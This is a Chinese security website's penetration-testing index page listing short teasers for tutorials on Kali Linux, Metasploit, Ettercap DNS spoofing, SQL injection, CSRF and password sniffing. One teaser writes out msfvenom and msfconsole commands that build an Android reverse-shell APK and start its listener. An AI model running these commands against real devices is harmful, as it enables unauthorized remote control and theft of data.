安基网 首页 安全渗透测试
订阅

渗透测试

  • kali linux国内源加速

    kali linux国内源加速
    # leafpad /etc/apt/sources.list#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb
    2019-9-30 09:32
  • 傻瓜化渗透软件:Armitage

    傻瓜化渗透软件:Armitage
    傻瓜式的渗透软件:Armitage各位小伙伴们大部分都知道metasploit,为了其他小伙伴我就简单介绍一下Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计, ...
    2019-9-28 10:40
  • 搜索引擎 – 永不过时的渗透神器

    搜索引擎 – 永不过时的渗透神器
    搜索引擎是我日常工作中用得最多的一款工具,国内常用的搜索引擎包括Baidu,sougou,bing,以及信息安全从业人员必备的几款网络搜索引擎。Google搜索引擎这里之所以要介绍google搜索引擎,是因为它有别于百度、搜狗等内容搜索引擎,其在安全界有着非同一般的地位,甚至专门有一名词为google hacking用 ...
    2019-9-23 12:00
  • Kali Linux实战篇:Ettercap 使用教程+DNS欺骗攻击实战

    Kali Linux实战篇:Ettercap 使用教程+DNS欺骗攻击实战
    EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具。它具有动态连接嗅探、动态内容过滤和许多其他有趣的技巧。它支持对许多协议的主动和被动分析,并包含许多用于网络和主机分析的特性。主要适用于交换局域网络,借 ...
    2019-9-23 11:47
  • 使用kali linux,利用Meterpreter成功渗透Linux主机并新建用户

    使用kali linux,利用Meterpreter成功渗透Linux主机并新建用户
    前言Meterpreter作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。之前的文章《利用Metasploi ...
    2019-9-23 11:47
  • 某OA系统从SYSTEM权限SQL注入到内网漫游

    某OA系统从SYSTEM权限SQL注入到内网漫游
    已提交至漏洞盒子,漏洞编号: vulbox-2019-0207481此漏洞属于高危类型, 因为漏洞未经官方公开,敏感内容做打码处理,如有漏打,请提醒。0x01 发现漏洞七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注 ...
    2019-9-22 11:18
  • 一系列精选的渗透测试资源工具和其他的东西

    一系列精选的渗透测试资源工具和其他的东西
    一组很棒的渗透测试资源。渗透测试是对计算机系统及其物理基础设施发起授权的、模拟的攻击,以暴露潜在的安全弱点和漏洞的实践。此项目由Netsparker Web应用程序安全扫描器支持内容匿名工具反病毒逃避工具书防御性编程书籍黑客手册系列丛书锁拿书恶意软件分析的书网络分析的书渗透测试书籍逆向工程的书 ...
    2019-9-20 11:09
  • Kali系列之入侵安卓手机

    Kali系列之入侵安卓手机
    1.查看kali的IP2.输入生成反弹木马命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.21.128 lport=55555 R > /home/1.apk3.启动msfconsole,配置相关参数msfconsole //启动msfconsoleuse exploit/multi/handler //加载模块set payload android/meterpreter/reverse_tcp //选择Paylo ...
    2019-9-20 11:06
  • 你了解过渗透测试扫描器FuXi-Scanner吗

    你了解过渗透测试扫描器FuXi-Scanner吗
    伏羲是一款开源的安全检测工具,适用于中小型企业对企业内部进行安全检测和资产统计。功能一览:基于插件的漏洞扫描功能(类似于巡风)漏洞管理多种协议的弱口令检测企业的子域名收集企业内部资产管理与服务探测端口扫描AWVS接口调用1.拉取镜像docker pull jeffzh3ng/fuxi-scanner2.安装容器docker run ...
    2019-9-20 11:03
  • 网站漏洞测试 sql注入攻击代码的审计与检测

    网站漏洞测试 sql注入攻击代码的审计与检测
    wordpress系统本身代码,很少出现sql注入漏洞,反倒是第三方的插件出现太多太多的漏洞,我们发现,仅仅2019年9月份就出现8个插件漏洞,因为第三方开发的插件,技术都参差不齐,对安全方面也不是太懂导致写代码过程中没有对sql注入,以及xss跨站进行前端安全过滤,才导致发生sql注入漏洞。目前发现的wor ...
    2019-9-17 09:34
  • 在你开始使用 Kali Linux 之前务必要知道的事情

    在你开始使用 Kali Linux 之前务必要知道的事情
    在你开始使用 Kali Linux 之前必须知道的事情作者: M.hanny Sabbagh译者: LCTT MjSeven转载自:https://linux.cn/article-10198-1.htmlKali Linux 在渗透测试和白帽子方面是业界领先的 Linux 发行版。默认情况下,该发行版附带了大量入侵和渗透的工具和软件,并且在全世界都得到了广泛认可。即使在那 ...
    2019-9-17 09:24
  • 渗透测试之CSRF代码漏洞的检测与加固方案

    渗透测试之CSRF代码漏洞的检测与加固方案
    XSS跨站以及CSRF攻击,在目前的渗透测试,以及网站漏洞检测中 ,经常的被爆出有高危漏洞,我们在对客户网站进行渗透测试时,也常有的发现客户网站以及APP存在以上的漏洞,其实CSRF以及XSS跨站很容易被发现以及利用,在收集客户网站域名,以及其他信息的时候,大体的注意一些请求操作,前端输入,get,po ...
    2019-9-7 03:36
  • 渗透测试:Burp suite 之 Burp Collaborator模块

    渗透测试:Burp suite 之 Burp Collaborator模块
    我们在做渗透测试的时候,经常会遇到这种情况,测试跨站可能有些功能插入恶意脚本后无法立即触发或者是盲注跨站这种。解决办法是,我们需要一个外部的独立的服务器,可以通过域名 url 进行访问。而Burp 给我们提供了这个外部服务器,叫 Collaborator,一起来了解下吧~Burp Collaborator的介绍Burp suit ...
    2019-9-1 00:25
  • Psnuffle 口令探测

    Psnuffle 口令探测
    Psnuffle 口令嗅探——ftp示例进入渗透框架msf输入命令:use auxiliary/sniffer/psnuffle原理:(截获常见协议下的ftp、imap、pop3、smb、url等身份认证过程,记录用户名和密码)换句话说,只要在网段中进行此模块监听,网段中的任何主机只要访问任何一台网段中的某台ftp服务器,监听端主机就会自动截 ...
    2019-8-31 01:03
  • Kali Linux 下10个常用渗透工具

    Kali Linux 下10个常用渗透工具
    Nmap(即 “网络映射器”)是 Kali Linux 上最受欢迎的信息收集工具之一。换句话说,它可以获取有关主机的信息:其 IP 地址、操作系统检测以及网络安全的详细信息(如开放的端口数量及其含义)。它还提供防火墙规避和欺骗功能。2、LynisLynisLynis 是安全审计、合规性测试和系统强化的强大 ...
    2019-8-29 13:34
  • 最新
    热门
    返回顶部